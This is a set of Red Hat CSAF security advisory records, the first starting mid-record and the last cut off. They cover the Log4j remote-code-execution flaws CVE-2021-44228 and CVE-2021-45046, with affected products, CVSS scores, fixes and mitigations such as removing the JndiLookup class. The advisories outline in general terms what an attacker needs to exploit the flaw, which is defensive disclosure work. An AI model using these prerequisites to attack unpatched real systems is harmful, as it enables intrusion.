"4.2.3" } }, "id": "RHSA-2021:5130", "initial_release_date": "2021-12-14T17:55:09+00:00", "revision_history": [ { "date": "2021-12-14T17:55:09+00:00", "number": "1", "summary": "Initial version" }, { "date": "2021-12-14T17:55:09+00:00", "number": "2", "summary": "Last updated version" }, { "date": "2024-12-12T01:17:25+00:00", "number": "3", "summary": "Last generated version" } ], "status": "final", "version": "3" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_name", "name": "Red Hat Integration", "product": { "name": "Red Hat Integration", "product_id": "Red Hat Integration", "product_identification_helper": { "cpe": "cpe:/a:redhat:integration:1" } } } ], "category": "product_family", "name": "Red Hat Integration" } ], "category": "vendor", "name": "Red Hat" } ] }, "vulnerabilities": [ { "cve": "CVE-2021-44228", "cwe": { "id": "CWE-20", "name": "Improper Input Validation" }, "discovery_date": "2021-12-10T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2030932" } ], "notes": [ { "category": "description", "text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.15.0. A remote attacker who can control log messages or log message parameters, can execute arbitrary code on the server via JNDI LDAP endpoint.", "title": "Vulnerability description" }, { "category": "summary", "text": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value", "title": "Vulnerability summary" }, { "category": "other", "text": "This issue only affects log4j versions between 2.0 and 2.14.1. In order to exploit this flaw you need:\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n\nIn Red Hat OpenShift Logging the vulnerable log4j library is shipped in the Elasticsearch components. 
Because Elasticsearch is not susceptible to remote code execution with this vulnerability due to use of the Java Security Manager and because access to these components is limited, the impact by this vulnerability is reduced to Moderate.\n\nAs per upstream applications using Log4j 1.x may be impacted by this flaw if their configuration uses JNDI. However, the risk is much lower. This flaw in Log4j 1.x is tracked via https://access.redhat.com/security/cve/CVE-2021-4104 and has been rated as having Moderate security impact.\n\nCodeReady Studio version 12.21.1 was released containing a fix for this vulnerability.\n\nThe following products are NOT affected by this flaw and have been explicitly listed here for the benefit of our customers.\n- Red Hat Enterprise Linux\n- Red Hat Advanced Cluster Management for Kubernetes \n- Red Hat Advanced Cluster Security for Kubernetes\n- Red Hat Ansible Automation Platform (Engine and Tower)\n- Red Hat Certificate System\n- Red Hat Directory Server\n- Red Hat Identity Management\n- Red Hat CloudForms \n- Red Hat Update Infrastructure\n- Red Hat Satellite\n- Red Hat Ceph Storage\n- Red Hat Gluster Storage\n- Red Hat OpenShift Data Foundation\n- Red Hat OpenStack Platform\n- Red Hat Virtualization\n- Red Hat Single Sign-On\n- Red Hat 3scale API Management", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat Integration" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-44228" }, { "category": "external", "summary": "RHBZ#2030932", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932" }, { "category": "external", "summary": "RHSB-2021-009", "url": 
"https://access.redhat.com/security/vulnerabilities/RHSB-2021-009" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-44228", "url": "https://www.cve.org/CVERecord?id=CVE-2021-44228" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228" }, { "category": "external", "summary": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q", "url": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q" }, { "category": "external", "summary": "https://logging.apache.org/log4j/2.x/security.html", "url": "https://logging.apache.org/log4j/2.x/security.html" }, { "category": "external", "summary": "https://www.lunasec.io/docs/blog/log4j-zero-day/", "url": "https://www.lunasec.io/docs/blog/log4j-zero-day/" }, { "category": "external", "summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog" } ], "release_date": "2021-12-10T02:01:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T17:55:09+00:00", "details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "Red Hat Integration" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5130" }, { "category": "workaround", "details": "For Log4j versions \u003e=2.10\nset the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true\n\nFor Log4j versions \u003e=2.7 and \u003c=2.14.1\nall PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m\n\nFor Log4j versions \u003e=2.0-beta9 and \u003c=2.10.0\nremove the JndiLookup class from the classpath. 
For example: \n```\nzip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class\n```\n\nOn OpenShift 4 and in OpenShift Logging, the above mitigation can be applied by following the steps in this article: https://access.redhat.com/solutions/6578421\n\nOn OpenShift 3.11, mitigation to the affected Elasticsearch component can be applied by following the steps in this article: https://access.redhat.com/solutions/6578441", "product_ids": [ "Red Hat Integration" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "Red Hat Integration" ] } ], "threats": [ { "category": "exploit_status", "date": "2021-12-10T00:00:00+00:00", "details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog" }, { "category": "impact", "details": "Critical" } ], "title": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value" } ] }
rhsa-2021_5094
Vulnerability from csaf_redhat
Notes
{ "document": { "aggregate_severity": { "namespace": "https://access.redhat.com/security/updates/classification/", "text": "Moderate" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "Red Hat OpenShift Container Platform release 3.11.z is now available with\nupdates to packages and images that fix several bugs and add enhancements.\n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section.", "title": "Topic" }, { "category": "general", "text": "Red Hat OpenShift Container Platform is Red Hat\u0027s cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\n\nSecurity Fix(es):\n\n* log4j-core: Remote code execution in Log4j 2.x when logs contain an\nattacker-controlled string value (CVE-2021-44228)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s)\nlisted in the References section.", "title": "Details" }, { "category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. 
and provide a link to the original.", "title": "Terms of Use" } ], "publisher": { "category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com" }, "references": [ { "category": "self", "summary": "https://access.redhat.com/errata/RHSA-2021:5094", "url": "https://access.redhat.com/errata/RHSA-2021:5094" }, { "category": "external", "summary": "https://access.redhat.com/security/updates/classification/#moderate", "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "category": "external", "summary": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009", "url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009" }, { "category": "external", "summary": "2030932", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932" }, { "category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2021/rhsa-2021_5094.json" } ], "title": "Red Hat Security Advisory: OpenShift Container Platform 3.11.z security update", "tracking": { "current_release_date": "2024-12-12T01:16:54+00:00", "generator": { "date": "2024-12-12T01:16:54+00:00", "engine": { "name": "Red Hat SDEngine", "version": "4.2.3" } }, "id": "RHSA-2021:5094", "initial_release_date": "2021-12-14T05:50:14+00:00", "revision_history": [ { "date": "2021-12-14T05:50:14+00:00", "number": "1", "summary": "Initial version" }, { "date": "2021-12-14T05:50:14+00:00", "number": "2", "summary": "Last updated version" }, { "date": "2024-12-12T01:16:54+00:00", "number": "3", "summary": "Last generated version" } ], "status": "final", "version": "3" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_name", "name": "Red Hat OpenShift Container Platform 
3.11", "product": { "name": "Red Hat OpenShift Container Platform 3.11", "product_id": "7Server-RH7-RHOSE-3.11", "product_identification_helper": { "cpe": "cpe:/a:redhat:openshift:3.11::el7" } } } ], "category": "product_family", "name": "Red Hat OpenShift Enterprise" }, { "branches": [ { "category": "product_version", "name": "openshift3/ose-logging-elasticsearch5@sha256:88379eab3d1e07f120b5dc6fa6ba4ebf96d3afb6aaf388d279084d675b23b5c2_amd64", "product": { "name": "openshift3/ose-logging-elasticsearch5@sha256:88379eab3d1e07f120b5dc6fa6ba4ebf96d3afb6aaf388d279084d675b23b5c2_amd64", "product_id": "openshift3/ose-logging-elasticsearch5@sha256:88379eab3d1e07f120b5dc6fa6ba4ebf96d3afb6aaf388d279084d675b23b5c2_amd64", "product_identification_helper": { "purl": "pkg:oci/ose-logging-elasticsearch5@sha256:88379eab3d1e07f120b5dc6fa6ba4ebf96d3afb6aaf388d279084d675b23b5c2?arch=amd64\u0026repository_url=registry.redhat.io/openshift3/ose-logging-elasticsearch5\u0026tag=v3.11.570-2.gd119820" } } } ], "category": "architecture", "name": "amd64" } ], "category": "vendor", "name": "Red Hat" } ], "relationships": [ { "category": "default_component_of", "full_product_name": { "name": "openshift3/ose-logging-elasticsearch5@sha256:88379eab3d1e07f120b5dc6fa6ba4ebf96d3afb6aaf388d279084d675b23b5c2_amd64 as a component of Red Hat OpenShift Container Platform 3.11", "product_id": "7Server-RH7-RHOSE-3.11:openshift3/ose-logging-elasticsearch5@sha256:88379eab3d1e07f120b5dc6fa6ba4ebf96d3afb6aaf388d279084d675b23b5c2_amd64" }, "product_reference": "openshift3/ose-logging-elasticsearch5@sha256:88379eab3d1e07f120b5dc6fa6ba4ebf96d3afb6aaf388d279084d675b23b5c2_amd64", "relates_to_product_reference": "7Server-RH7-RHOSE-3.11" } ] }, "vulnerabilities": [ { "cve": "CVE-2021-44228", "cwe": { "id": "CWE-20", "name": "Improper Input Validation" }, "discovery_date": "2021-12-10T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2030932" } ], "notes": [ { "category": "description", 
"text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.15.0. A remote attacker who can control log messages or log message parameters, can execute arbitrary code on the server via JNDI LDAP endpoint.", "title": "Vulnerability description" }, { "category": "summary", "text": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value", "title": "Vulnerability summary" }, { "category": "other", "text": "This issue only affects log4j versions between 2.0 and 2.14.1. In order to exploit this flaw you need:\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n\nIn Red Hat OpenShift Logging the vulnerable log4j library is shipped in the Elasticsearch components. Because Elasticsearch is not susceptible to remote code execution with this vulnerability due to use of the Java Security Manager and because access to these components is limited, the impact by this vulnerability is reduced to Moderate.\n\nAs per upstream applications using Log4j 1.x may be impacted by this flaw if their configuration uses JNDI. However, the risk is much lower. 
This flaw in Log4j 1.x is tracked via https://access.redhat.com/security/cve/CVE-2021-4104 and has been rated as having Moderate security impact.\n\nCodeReady Studio version 12.21.1 was released containing a fix for this vulnerability.\n\nThe following products are NOT affected by this flaw and have been explicitly listed here for the benefit of our customers.\n- Red Hat Enterprise Linux\n- Red Hat Advanced Cluster Management for Kubernetes \n- Red Hat Advanced Cluster Security for Kubernetes\n- Red Hat Ansible Automation Platform (Engine and Tower)\n- Red Hat Certificate System\n- Red Hat Directory Server\n- Red Hat Identity Management\n- Red Hat CloudForms \n- Red Hat Update Infrastructure\n- Red Hat Satellite\n- Red Hat Ceph Storage\n- Red Hat Gluster Storage\n- Red Hat OpenShift Data Foundation\n- Red Hat OpenStack Platform\n- Red Hat Virtualization\n- Red Hat Single Sign-On\n- Red Hat 3scale API Management", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "7Server-RH7-RHOSE-3.11:openshift3/ose-logging-elasticsearch5@sha256:88379eab3d1e07f120b5dc6fa6ba4ebf96d3afb6aaf388d279084d675b23b5c2_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-44228" }, { "category": "external", "summary": "RHBZ#2030932", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932" }, { "category": "external", "summary": "RHSB-2021-009", "url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-44228", "url": "https://www.cve.org/CVERecord?id=CVE-2021-44228" }, { "category": "external", "summary": 
"https://nvd.nist.gov/vuln/detail/CVE-2021-44228", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228" }, { "category": "external", "summary": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q", "url": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q" }, { "category": "external", "summary": "https://logging.apache.org/log4j/2.x/security.html", "url": "https://logging.apache.org/log4j/2.x/security.html" }, { "category": "external", "summary": "https://www.lunasec.io/docs/blog/log4j-zero-day/", "url": "https://www.lunasec.io/docs/blog/log4j-zero-day/" }, { "category": "external", "summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog" } ], "release_date": "2021-12-10T02:01:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T05:50:14+00:00", "details": "See the following documentation, which will be updated shortly for release\n3.11.z, for important instructions on how to upgrade your cluster and fully\napply this asynchronous errata update:\n\nhttps://docs.openshift.com/container-platform/3.11/release_notes/ocp_3_11_release_notes.html\n\nThis update is available via the Red Hat Network. 
Details on how to use the\nRed Hat Network to apply this update are available at\nhttps://access.redhat.com/articles/11258 .", "product_ids": [ "7Server-RH7-RHOSE-3.11:openshift3/ose-logging-elasticsearch5@sha256:88379eab3d1e07f120b5dc6fa6ba4ebf96d3afb6aaf388d279084d675b23b5c2_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5094" }, { "category": "workaround", "details": "For Log4j versions \u003e=2.10\nset the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true\n\nFor Log4j versions \u003e=2.7 and \u003c=2.14.1\nall PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m\n\nFor Log4j versions \u003e=2.0-beta9 and \u003c=2.10.0\nremove the JndiLookup class from the classpath. For example: \n```\nzip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class\n```\n\nOn OpenShift 4 and in OpenShift Logging, the above mitigation can be applied by following the steps in this article: https://access.redhat.com/solutions/6578421\n\nOn OpenShift 3.11, mitigation to the affected Elasticsearch component can be applied by following the steps in this article: https://access.redhat.com/solutions/6578441", "product_ids": [ "7Server-RH7-RHOSE-3.11:openshift3/ose-logging-elasticsearch5@sha256:88379eab3d1e07f120b5dc6fa6ba4ebf96d3afb6aaf388d279084d675b23b5c2_amd64" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "7Server-RH7-RHOSE-3.11:openshift3/ose-logging-elasticsearch5@sha256:88379eab3d1e07f120b5dc6fa6ba4ebf96d3afb6aaf388d279084d675b23b5c2_amd64" ] } ], 
"threats": [ { "category": "exploit_status", "date": "2021-12-10T00:00:00+00:00", "details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog" }, { "category": "impact", "details": "Moderate" } ], "title": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value" }, { "cve": "CVE-2021-45046", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2021-12-14T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2032580" } ], "notes": [ { "category": "description", "text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.16.0. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input using a JNDI Lookup pattern resulting in remote code execution (RCE) in a limited number of environments.", "title": "Vulnerability description" }, { "category": "summary", "text": "log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228)", "title": "Vulnerability summary" }, { "category": "other", "text": "Although we have matched Apache\u0027s CVSS score, with the exception of the scope metric which will remain unaltered at \"unchanged\"; as we believe code execution would be at the permission levels of the running JVM and not exceeding that of the original CVE-2021-44228 flaw.\n \nWe have given this vulnerability an impact rating of Moderate, this is because of the unlikely nature of log4j lookup mapping values being derived from attacker controlled values. This is not the default configuration for end-applications using log4j 2.x and would require explicit action from a privileged user (a developer or administrator) to access the vulnerability. 
\nIn certain non-default configurations, it was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was insufficient.\n\nThis issue affects the log4j version between 2.0 and 2.15. Log4j 1.x is NOT impacted by this vulnerability. \n\nPrerequisites to exploit this flaw are :\n\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n- Log4j configuration file should be explicitly configured to use a non-default Pattern Layout with a Context Lookup eg. ($${ctx:loginId}) \n\nIn most cases, the mitigation suggested for CVE-2021-44228 (i.e. to set the system property `log4j2.noFormatMsgLookup` to `true) does NOT mitigate this specific vulnerability. \nLog4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default.\n\nFor Elasticsearch, as shipped in OpenShift 3.11, the \"log4j2.formatMsgNoLookups=true\" system property mitigation is sufficient as there are no included non-standard configurations that allow for exploitation:\n\nhttps://github.com/openshift/openshift-ansible/blob/release-3.11/roles/openshift_logging_elasticsearch/templates/log4j2.properties.j2\n\nhttps://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476\n\nFor CodeReady Studio the fix for this flaw is available on CodeReady Studio 12.21.3 and above versions.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "7Server-RH7-RHOSE-3.11:openshift3/ose-logging-elasticsearch5@sha256:88379eab3d1e07f120b5dc6fa6ba4ebf96d3afb6aaf388d279084d675b23b5c2_amd64" ] }, 
"references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-45046" }, { "category": "external", "summary": "RHBZ#2032580", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2032580" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-45046", "url": "https://www.cve.org/CVERecord?id=CVE-2021-45046" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-45046", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-45046" }, { "category": "external", "summary": "https://access.redhat.com/security/cve/CVE-2021-44228", "url": "https://access.redhat.com/security/cve/CVE-2021-44228" }, { "category": "external", "summary": "https://logging.apache.org/log4j/2.x/security.html", "url": "https://logging.apache.org/log4j/2.x/security.html" }, { "category": "external", "summary": "https://www.openwall.com/lists/oss-security/2021/12/14/4", "url": "https://www.openwall.com/lists/oss-security/2021/12/14/4" }, { "category": "external", "summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog" } ], "release_date": "2021-12-14T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T05:50:14+00:00", "details": "See the following documentation, which will be updated shortly for release\n3.11.z, for important instructions on how to upgrade your cluster and fully\napply this asynchronous errata update:\n\nhttps://docs.openshift.com/container-platform/3.11/release_notes/ocp_3_11_release_notes.html\n\nThis update is available via the Red Hat Network. 
Details on how to use the\nRed Hat Network to apply this update are available at\nhttps://access.redhat.com/articles/11258 .", "product_ids": [ "7Server-RH7-RHOSE-3.11:openshift3/ose-logging-elasticsearch5@sha256:88379eab3d1e07f120b5dc6fa6ba4ebf96d3afb6aaf388d279084d675b23b5c2_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5094" }, { "category": "workaround", "details": "For Log4j versions up to and including 2.15.0, this issue can be mitigated by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).", "product_ids": [ "7Server-RH7-RHOSE-3.11:openshift3/ose-logging-elasticsearch5@sha256:88379eab3d1e07f120b5dc6fa6ba4ebf96d3afb6aaf388d279084d675b23b5c2_amd64" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "7Server-RH7-RHOSE-3.11:openshift3/ose-logging-elasticsearch5@sha256:88379eab3d1e07f120b5dc6fa6ba4ebf96d3afb6aaf388d279084d675b23b5c2_amd64" ] } ], "threats": [ { "category": "exploit_status", "date": "2023-05-01T00:00:00+00:00", "details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog" }, { "category": "impact", "details": "Moderate" } ], "title": "log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228)" } ] }
rhsa-2022_0082
Vulnerability from csaf_redhat
Notes
{ "document": { "aggregate_severity": { "namespace": "https://access.redhat.com/security/updates/classification/", "text": "Critical" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "An update is now available for Red Hat Process Automation Manager.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", "title": "Topic" }, { "category": "general", "text": "Red Hat Process Automation Manager is an open source business process management suite that combines process management and decision service management and enables business and IT users to create, manage, validate, and deploy process applications and decision services.\n\nThis release of Red Hat Process Automation Manager 7.11.1 serves as an update to Red Hat Process Automation Manager 7.11.0, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es):\n\n* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)", "title": "Details" }, { "category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. 
and provide a link to the original.", "title": "Terms of Use" } ], "publisher": { "category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com" }, "references": [ { "category": "self", "summary": "https://access.redhat.com/errata/RHSA-2022:0082", "url": "https://access.redhat.com/errata/RHSA-2022:0082" }, { "category": "external", "summary": "https://access.redhat.com/security/updates/classification/#critical", "url": "https://access.redhat.com/security/updates/classification/#critical" }, { "category": "external", "summary": "2030932", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932" }, { "category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2022/rhsa-2022_0082.json" } ], "title": "Red Hat Security Advisory: Red Hat Process Automation Manager 7.11.1 security update", "tracking": { "current_release_date": "2024-12-12T01:19:23+00:00", "generator": { "date": "2024-12-12T01:19:23+00:00", "engine": { "name": "Red Hat SDEngine", "version": "4.2.3" } }, "id": "RHSA-2022:0082", "initial_release_date": "2022-01-11T17:56:46+00:00", "revision_history": [ { "date": "2022-01-11T17:56:46+00:00", "number": "1", "summary": "Initial version" }, { "date": "2022-01-11T17:56:46+00:00", "number": "2", "summary": "Last updated version" }, { "date": "2024-12-12T01:19:23+00:00", "number": "3", "summary": "Last generated version" } ], "status": "final", "version": "3" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_name", "name": "RHPAM 7.11.1", "product": { "name": "RHPAM 7.11.1", "product_id": "RHPAM 7.11.1", "product_identification_helper": { "cpe": "cpe:/a:redhat:jboss_enterprise_bpms_platform:7.11" } } } ], "category": 
"product_family", "name": "Red Hat Process Automation Manager" } ], "category": "vendor", "name": "Red Hat" } ] }, "vulnerabilities": [ { "cve": "CVE-2021-44228", "cwe": { "id": "CWE-20", "name": "Improper Input Validation" }, "discovery_date": "2021-12-10T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2030932" } ], "notes": [ { "category": "description", "text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.15.0. A remote attacker who can control log messages or log message parameters, can execute arbitrary code on the server via JNDI LDAP endpoint.", "title": "Vulnerability description" }, { "category": "summary", "text": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value", "title": "Vulnerability summary" }, { "category": "other", "text": "This issue only affects log4j versions between 2.0 and 2.14.1. In order to exploit this flaw you need:\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n\nIn Red Hat OpenShift Logging the vulnerable log4j library is shipped in the Elasticsearch components. Because Elasticsearch is not susceptible to remote code execution with this vulnerability due to use of the Java Security Manager and because access to these components is limited, the impact by this vulnerability is reduced to Moderate.\n\nAs per upstream applications using Log4j 1.x may be impacted by this flaw if their configuration uses JNDI. However, the risk is much lower. 
This flaw in Log4j 1.x is tracked via https://access.redhat.com/security/cve/CVE-2021-4104 and has been rated as having Moderate security impact.\n\nCodeReady Studio version 12.21.1 was released containing a fix for this vulnerability.\n\nThe following products are NOT affected by this flaw and have been explicitly listed here for the benefit of our customers.\n- Red Hat Enterprise Linux\n- Red Hat Advanced Cluster Management for Kubernetes \n- Red Hat Advanced Cluster Security for Kubernetes\n- Red Hat Ansible Automation Platform (Engine and Tower)\n- Red Hat Certificate System\n- Red Hat Directory Server\n- Red Hat Identity Management\n- Red Hat CloudForms \n- Red Hat Update Infrastructure\n- Red Hat Satellite\n- Red Hat Ceph Storage\n- Red Hat Gluster Storage\n- Red Hat OpenShift Data Foundation\n- Red Hat OpenStack Platform\n- Red Hat Virtualization\n- Red Hat Single Sign-On\n- Red Hat 3scale API Management", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "RHPAM 7.11.1" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-44228" }, { "category": "external", "summary": "RHBZ#2030932", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932" }, { "category": "external", "summary": "RHSB-2021-009", "url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-44228", "url": "https://www.cve.org/CVERecord?id=CVE-2021-44228" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228" }, { "category": "external", "summary": 
